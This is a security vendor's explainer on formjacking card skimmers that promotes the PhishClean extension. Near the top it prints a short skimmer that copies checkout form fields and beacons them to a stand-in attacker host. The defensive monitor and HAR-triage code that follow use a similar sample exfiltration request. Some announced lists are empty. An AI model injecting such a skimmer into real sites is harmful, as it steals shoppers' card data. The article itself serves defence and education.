Formjacking Attacks

In September 2018, British Airways disclosed that attackers had stolen payment card details from 380,000 customers. The cards weren't taken from a database breach. They were skimmed — in real time — from the checkout page by 22 lines of JavaScript.

Symantec blocked an average of 4,800 formjacking attempts per month across their customer base in 2019. The attacks targeted everything from small Shopify stores to Fortune 500 companies. A single compromised site can bleed card numbers for months before anyone notices.

What Formjacking Looks Like Under the Hood

Formjacking is the digital equivalent of a card skimmer at a gas pump, except that instead of a physical device it is a few lines of JavaScript injected into a website's checkout page. The code watches for form submissions — specifically payment forms — and silently copies the data to a server controlled by the attacker.

Here's a simplified version of what a formjacking script does:

// Simplified formjacking skimmer
document.querySelector('form#checkout')
  .addEventListener('submit', function(e) {
    var formData = new FormData(e.target);
    var stolen = {};
    formData.forEach(function(val, key) {
      stolen[key] = val;
    });

    // Send stolen data to attacker's server
    navigator.sendBeacon(
      'https://attacker-cdn.com/collect',
      JSON.stringify(stolen)
    );
  });

That's it. The form still submits normally to the real payment processor. Your order goes through. You get a confirmation email. The only difference is that your card number, expiration date, and CVV were also sent to someone else.

This is what makes formjacking so dangerous — there's zero visible impact on the user experience.
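The skimmer above exfiltrates through navigator.sendBeacon, and the defence that matches the mechanism is to watch those outbound channels from inside the page. The following is an added example, not PhishClean's code or anything from the original article: a small monitor that wraps navigator.sendBeacon and fetch, resolves each destination against the page's own origin and an allowlist of expected payment and analytics origins, and reports anything else, noting whether it fired while a form was submitting. The origins (shop.example, payments.example, attacker-cdn.example) and the window-like object it is installed on are constructed for the example.

```javascript
// Added example (not PhishClean's code): a page-side monitor for the outbound
// channels a skimmer typically uses. Load it as the first script on the
// checkout page so its wrappers are in place before any third-party code runs.
// All host names used with it are constructed for the example.

function originOf(url, base) {
  try {
    return new URL(url, base).origin;
  } catch (e) {
    return null; // unparsable URL: treat as unknown
  }
}

function createExfilMonitor({ pageOrigin, allowedOrigins = [], report = () => {} }) {
  const allowed = new Set([pageOrigin, ...allowedOrigins]);
  const findings = [];
  let submitting = false;

  // Record one outbound request and report it if its origin is not expected.
  function inspect(api, url) {
    const origin = originOf(url, pageOrigin);
    const finding = {
      api,
      url,
      origin,
      suspicious: origin === null || !allowed.has(origin),
      duringSubmit: submitting,
    };
    findings.push(finding);
    if (finding.suspicious) report(finding);
    return finding;
  }

  // Wrap the exfiltration-capable APIs on a window-like object. The wrappers
  // only observe; the original call still goes through unchanged.
  function install(win) {
    const nav = win.navigator;
    if (nav && typeof nav.sendBeacon === 'function') {
      const realSendBeacon = nav.sendBeacon.bind(nav);
      nav.sendBeacon = function (url, data) {
        inspect('sendBeacon', String(url));
        return realSendBeacon(url, data);
      };
    }
    if (typeof win.fetch === 'function') {
      const realFetch = win.fetch.bind(win);
      win.fetch = function (input, init) {
        // fetch accepts a string, a URL or a Request; Request carries .url
        const url = input && typeof input === 'object' && 'url' in input ? input.url : String(input);
        inspect('fetch', url);
        return realFetch(input, init);
      };
    }
  }

  // A capturing listener on the document fires before any listener on the
  // form itself, so the submit window opens before a skimmer's handler runs.
  function watchDocument(doc, windowMs = 2000) {
    doc.addEventListener('submit', function () {
      submitting = true;
      setTimeout(function () { submitting = false; }, windowMs);
    }, true);
  }

  return {
    install,
    watchDocument,
    setSubmitting(flag) { submitting = flag; },
    findings() { return findings.slice(); },
  };
}
```

In a browser the monitor is installed with `createExfilMonitor({...}).install(window)` followed by `watchDocument(document)`. It covers sendBeacon and fetch only; a browser-enforced Content-Security-Policy with a tight connect-src and img-src is the complementary control, since it also closes channels this hook does not see, such as image-pixel requests, and cannot be unwrapped by a script that captured the original API references first.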

Who's Behind It: Magecart and Beyond

The term "Magecart" refers to a loose coalition of cybercriminal groups that specialize in web-based card skimming. The name comes from their early focus on Magento e-commerce platforms, but they've long since expanded to target any website that processes payments.

Notable Magecart attacks include:

How Attackers Get the Script Onto a Website

1. Compromise the site directly

The attacker exploits a vulnerability in the website's CMS, admin panel, or server. Outdated Magento installations are a classic target — known vulnerabilities give attackers direct access to modify JavaScript files.

2. Poison a third-party script

Many sites load JavaScript from external providers — analytics, chat widgets, A/B testing tools. If the attacker compromises one of these providers, their skimmer gets injected into every site that loads that script. The Ticketmaster breach worked exactly this way.

3. Target the build pipeline

Sophisticated attackers compromise npm packages or build tools used by the website. The malicious code gets bundled into the site's JavaScript during the build process, making it nearly impossible to detect through simple file comparison.

Here's the part that surprises most people: formjacking doesn't set off any of the usual alarm bells. The site's SSL certificate is valid. The URL is correct. The page is the real checkout page. Your antivirus won't flag it because you haven't downloaded anything. Google Safe Browsing won't block it because the domain itself isn't malicious.

Why Traditional Security Tools Miss Formjacking

This is one of the most overlooked attack vectors, and the reason is structural. Most security tools weren't built for this threat model:

The attack lives in the gap between "the site is trustworthy" and "the code running on the site is trustworthy." Those are two very different things.

How PhishClean Catches Formjacking

PhishClean approaches the problem from the browser's perspective — which is exactly where formjacking happens. Two of its 15 detection signals are directly relevant:

These checks run locally on every page you visit. No browsing data leaves your device. PhishClean doesn't need to know you're shopping — it just watches for the patterns that indicate form data is going somewhere it shouldn't.

Related Threats

Phishing Attacks

Fake pages that trick you into entering credentials — the other side of credential theft.

Hidden iFrame Attacks

Invisible iframes used for clickjacking and credential harvesting.

SSL Stripping

Downgrading HTTPS connections so attackers can read your traffic.

API Key Leaks

When developer secrets end up exposed in web pages and source code.

Frequently Asked Questions

Can antivirus software detect formjacking?

Generally, no. Antivirus scans files on your device, but formjacking runs as JavaScript on a remote website you're visiting. There's nothing downloaded to your computer for antivirus to detect. Browser-based security tools like PhishClean are better suited because they can analyze the behavior of scripts running in the page.

How do I know if a website has been formjacked?

You almost certainly can't tell by looking at it. The page looks normal, works normally, and your transaction completes successfully. The skimmer runs invisibly. The realistic options are: inspect the page's network requests in DevTools for unfamiliar outbound connections, or use a browser extension like PhishClean that monitors form behavior automatically.
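The DevTools route above produces a lot of requests to read through by hand; exporting the session as a HAR file and triaging it offline is quicker. The block below is an added example, not code from the original page or from PhishClean: it walks a HAR export, keeps POST requests whose origin is neither the shop nor an expected provider, and raises the severity when the request body contains a Luhn-valid card-number-shaped value, which separates a harmless third-party analytics ping from a request actually carrying card data. The embedded HAR fragment and all origins in it are constructed for the example.

```javascript
// Added example (not PhishClean's code): offline triage of a DevTools HAR
// export from a checkout session. The sample HAR below is constructed.

// Luhn check: the checksum every real card number satisfies.
function luhnValid(digits) {
  let sum = 0;
  let double = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = Number(digits[i]);
    if (double) {
      d *= 2;
      if (d > 9) d -= 9;
    }
    sum += d;
    double = !double;
  }
  return sum % 10 === 0;
}

// Card numbers are 13 to 19 digits; strip spaces and dashes first so a
// formatted value such as "4111 1111 1111 1111" is still recognised.
function containsCardNumber(text) {
  const candidates = text.replace(/[\s-]/g, '').match(/\d{13,19}/g) || [];
  return candidates.some(luhnValid);
}

// Return every POST to an unexpected origin, with severity 'high' when the
// body carries a card-number-shaped value and 'info' otherwise.
function triageHar(har, { pageOrigin, allowedOrigins = [] }) {
  const allowed = new Set([pageOrigin, ...allowedOrigins]);
  const findings = [];
  for (const entry of har.log.entries) {
    const { method, url, postData } = entry.request;
    if (method !== 'POST') continue;
    let origin;
    try { origin = new URL(url).origin; } catch (e) { origin = null; }
    if (origin && allowed.has(origin)) continue;
    const body = (postData && postData.text) || '';
    findings.push({
      time: entry.startedDateTime,
      url,
      origin,
      severity: containsCardNumber(body) ? 'high' : 'info',
    });
  }
  return findings;
}

// Constructed HAR fragment: the real checkout POST, the processor call, a
// vendor analytics ping with an order id, and a beacon carrying card data.
const sampleHar = {
  log: {
    entries: [
      { startedDateTime: '2024-01-01T12:00:00.000Z',
        request: { method: 'POST', url: 'https://shop.example/checkout',
                   postData: { text: 'card=4111111111111111&exp=12%2F30' } } },
      { startedDateTime: '2024-01-01T12:00:00.200Z',
        request: { method: 'POST', url: 'https://payments.example/charge',
                   postData: { text: '{"pan":"4111111111111111","exp":"12/30"}' } } },
      { startedDateTime: '2024-01-01T12:00:00.250Z',
        request: { method: 'POST', url: 'https://analytics-vendor.example/track',
                   postData: { text: '{"event":"purchase","order":"1234567890123456"}' } } },
      { startedDateTime: '2024-01-01T12:00:00.300Z',
        request: { method: 'POST', url: 'https://attacker-cdn.example/collect',
                   postData: { text: '{"number":"4111111111111111","exp":"12/30"}' } } },
    ],
  },
};

function triageSample() {
  return triageHar(sampleHar, {
    pageOrigin: 'https://shop.example',
    allowedOrigins: ['https://payments.example'],
  });
}
```

Run against a real export with `triageHar(JSON.parse(fs.readFileSync('checkout.har', 'utf8')), {...})`. Requests that HAR records as GET with the data in the query string are not covered by the method filter; if a skimmer used that path the check would need to scan `url` as well as the body.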

Is formjacking the same as phishing?

No. Phishing uses a fake website to trick you into entering information. Formjacking compromises the real website. You're on the correct domain with a valid SSL certificate — everything is genuine except for the hidden script copying your data. That's what makes it harder to detect.

Protect Your Payment Data

PhishClean detects when form data is being sent to suspicious third-party servers — locally, in real time. 3-day free trial, no credit card required.
